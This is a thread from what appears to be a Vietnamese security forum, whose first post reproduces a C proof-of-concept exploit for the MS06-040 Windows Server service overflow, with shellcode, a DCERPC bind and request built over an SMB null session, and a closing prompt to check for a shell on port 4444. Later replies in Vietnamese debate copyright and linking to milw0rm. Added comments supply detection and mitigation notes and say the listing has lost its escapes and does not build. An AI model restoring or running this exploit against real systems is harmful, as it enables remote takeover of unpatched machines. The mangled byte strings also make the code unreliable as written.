  [Question]   MS Windows NetpIsRemote() Remote Overflow (MS06-040) 30/08/2006 00:16:29 (+0700) | #1 | 19001
LeonHart
HVA Friend

Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret
Rated as : Critical
Code:
/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 *  Windows XP SP1
 *  Windows 2000 SP4
 *
 * Systems Affected:
 *  Microsoft Windows 2000 SP0-SP4
 *  Microsoft Windows XP SP0-SP1
 *  Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// DCERPC "bind" PDU (packet type 0x0B) for interface
// 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0, the well-known Server
// Service (SRVSVC) interface.
// Defensive note: a null SMB session followed by a bind to this UUID over
// the browser pipe, then an opnum 0x1f call carrying an oversized string,
// is the on-the-wire pattern this tool produces; that sequence is what
// network detection for MS06-040 generally keys on.
// NOTE(review): as rendered on this page the string literals have lost
// their backslash escapes, so the array holds plain ASCII text rather
// than the PDU bytes; the listing is a historical artefact, not a build.
unsigned char DCERPC_Bind_RPC_Service[] =
      
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
      
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
      
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
      
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
       "x2Bx10x48x60x02x00x00x00";

// DCERPC "request" PDU (packet type 0x00) header.  The original author
// labels the opnum, 0x1f, as NetprPathCanonicalize on this interface.
// main() copies this header into szReqBuf, overwrites the string
// conformance/offset/count fields at offsets 44/48/52, appends the
// target-specific path buffer at offset 56, and then appends the
// trailer array below.  (Same rendering caveat as the bind PDU: the
// escapes are missing, so these are ASCII characters, not raw bytes.)
unsigned char DCERPC_Request_RPC_Service[] =
      
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
      
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
       "x00x00x00x00x01x00x00x00x00x00x00x00";

       // path ...  (the path string itself is built in main() and
       //            sits between the header above and the trailer below)

// Trailer that follows the path string inside the request PDU; main()
// copies it in after the "align string" padding.
unsigned char DCERPC_Request_RPC_Service_[] =
      
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
       "x00x00x00x00xfax00x00x00x00x00x00x00";

// Payload blob embedded in the request string.  Its behaviour is not
// discernible from this listing; the message printed at the end of
// main() ("check for shell on <host>:4444") indicates the author expects
// a listener on TCP 4444 after a successful run — TODO confirm by
// analysis, not assumed here.
// NOTE(review): as rendered, the escapes are missing, so sc[] is the
// ASCII text "x6ax51..." and not machine code; sizeof(sc) in main()
// therefore also differs from what the original tool used.
unsigned char sc[] =
      
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
      
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
      
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
      
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
      
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
      
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
      
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
      
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
      
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
      
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
      
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
      
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
      
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
      
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
      
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
      
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
      
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
      
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
      
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
      
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
      
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
       "xf8x67x66x77xf0xdbx57x41x6fx58";

/*
 * Entry point.  argv[1] is the target host name, argv[2] a target id
 * (1 = Windows 2000, 2 = Windows XP, per the usage text).
 *
 * What the program does on the wire, in order — the facts a defender
 * needs for log and network detection:
 *   1. WNetAddConnection2() to \\<host>\ipc$ with an empty user name and
 *      password, i.e. an SMB null session;
 *   2. CreateFile() on \\<host>\pipe\browser for read/write;
 *   3. one TransactNamedPipe() carrying the DCERPC bind PDU;
 *   4. one WriteFile() of the entire 2096-byte szReqBuf, whatever was
 *      (or was not) built into it.
 * Mitigation: the MS06-040 update removes the server-side flaw;
 * restricting anonymous SMB sessions and filtering SMB at the network
 * boundary remove the preconditions for steps 1-2.
 *
 * NOTE(review): the listing as rendered on this page has lost its
 * backslash escapes ('x90' is a multi-character constant here, "x04x08..."
 * is ASCII text), so it does not build into the original tool.
 * NOTE(review): if argv[2] is neither 1 nor 2, szReqBuf stays all-zero
 * and is still transmitted; hFile is not closed on the success path; the
 * usage check rejects argc < 3 but never validates argv[2] as a number.
 *
 * Returns 0 on completion of the send, -1 on any earlier failure.
 */
int main(int argc, char* argv[])
{
       HANDLE hFile;
       NETRESOURCE nr;

       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

       unsigned int i;

       unsigned char szInBuf[4096];
       unsigned long dwRead, nWritten;

       /* Fixed-size request; the whole buffer is sent in one WriteFile(). */
       unsigned char szReqBuf[2096];

       if (argc < 3){
               printf("[-] Usage: ms06040poc <host>
[target]n");
               printf("t1 - Windows 2000 SP0-SP4n");
               printf("t2 - Windows XP SP0-SP1n");
               return -1;
       }

       memset(szReqBuf, 0, sizeof(szReqBuf));

       /* Target 1: target-specific request layout.  The constants below
        * are left exactly as posted and are intentionally not annotated. */
       if (atoi(argv[2]) == 1) {
               unsigned char szBuff[1064];

               // build payload buffer
               memset(szBuff, 'x90', 1000);
               memcpy(szBuff+630, sc, sizeof(sc));

               for(i=1000; i<1064; i+=4) {
                       memcpy(szBuff+i, "x04x08x02x00", 4);
               }

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x15x02x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x15x02x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+1120, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
               memcpy(szReqBuf+1140 , "xebx02", 2);
       }
       /* Target 2: same structure, different sizes and constants.  Again
        * left as posted and not annotated. */
       if (atoi(argv[2]) == 2) {
               unsigned char szBuff[708];

               memset(szBuff, 'x90', 612); /* size of shellcode */
               memcpy(szBuff, sc, sizeof(sc));

               memcpy(szBuff+612, "x0ax08x02x00", 4);
               memset(szBuff+616, 'A', 8); // 8 bytes padding
               memcpy(szBuff+624, "x04x08x02x00", 4);
               memset(szBuff+628, 'x90', 32);
               memcpy(szBuff+660, "x04x08x02x00", 4);
               memset(szBuff+664, 'B', 8); // 8 bytes padding
               memcpy(szBuff+672, "x04x08x02x00", 4);
               memset(szBuff+676, 'x90', 32);

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x63x01x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x63x01x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+764, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
       }

       printf("[+] Connecting to %s ... n", argv[1]);

       /* Step 1: SMB null session to the IPC$ share.  Empty user and
        * password are passed explicitly; this is the first event a
        * server-side audit trail will show. */
       _snprintf(szRemoteName, sizeof(szRemoteName),
"\\%s\ipc$", argv[1]);
       nr.dwType = RESOURCETYPE_ANY;
       nr.lpLocalName = NULL;
       nr.lpProvider = NULL;
       nr.lpRemoteName = szRemoteName;
       if (WNetAddConnection2(&nr, "", "", 0) !=
NO_ERROR) {
               printf("[-] Failed to connect to host !n");
               return -1;
       }

       /* Step 2: open the browser named pipe over that session. */
       _snprintf(szPipePath, sizeof(szPipePath),
"\\%s\pipe\browser", argv[1]);
       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);

       if (hFile == INVALID_HANDLE_VALUE) {
               printf("[-] Failed to open named pipe !n");
               return -1;
       }

       /* Step 3: DCERPC bind; the bind_ack (if any) lands in szInBuf and
        * is never inspected beyond the call succeeding. */
       printf("[+] Binding to RPC interface ... n");
       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service,
sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL)
== 0) {
               printf("[-] Failed to bind to interface !n");
               CloseHandle(hFile);
               return -1;
       }

       /* Step 4: single write of the full request buffer.  No response is
        * read; success here only means the bytes were accepted by the pipe. */
       printf("[+] Sending RPC request ... n");
       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
               printf("[-] Unable to transmit RPC request
!n");
               CloseHandle(hFile);
               return -1;
       }

       /* NOTE(review): hFile is leaked on this path. */
       printf("[+] Now check for shell on %s:4444 !n",
argv[1]);

       return 0;
}
  [Question]   MS Windows NetpIsRemote() Remote Overflow (MS06-040) 31/08/2006 10:04:17 (+0700) | #2 | 19410
PHUCDOAN
Member

Joined: 04/08/2006 23:50:25
Messages: 33
Copyright!!!!!!!!!
Phúc còn nhớ lúc trước pác BigBall_Hacker post 1 bài tương tự nhưng nhận được sự phản ứng kịch liệt từ MOD (tạo rác cho forum) thế nhưng mời anh Conmale xem lại bài này có khác gì không?
Nếu có thể chỉ cần vậy thôi: http://milw0rm.com/exploits/2265 mọi người có thể tìm đến mà
  [Question]   MS Windows NetpIsRemote() Remote Overflow (MS06-040) 31/08/2006 13:34:50 (+0700) | #3 | 19453
havythoai
HVA Friend

Joined: 05/04/2004 22:59:39
Messages: 562

PHUCDOAN wrote:
Copyright!!!!!!!!!
Phúc còn nhớ lúc trước pác BigBall_Hacker post 1 bài tương tự nhưng nhận được sự phản ứng kịch liệt từ MOD (tạo rác cho forum) thế nhưng mời anh Conmale xem lại bài này có khác gì không?
Nếu có thể chỉ cần vậy thôi: http://milw0rm.com/exploits/2265 mọi người có thể tìm đến mà 

Tớ nghĩ là dòng màu cam cũng đủ để là bản quyền !

nếu chỉ cần post link thì người đọc mất công nhấp thêm 1 click nữa rồi mới xem được ...

nói chung! Tốt nhất là vừa post nội dung, vừa post link smilie)
/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4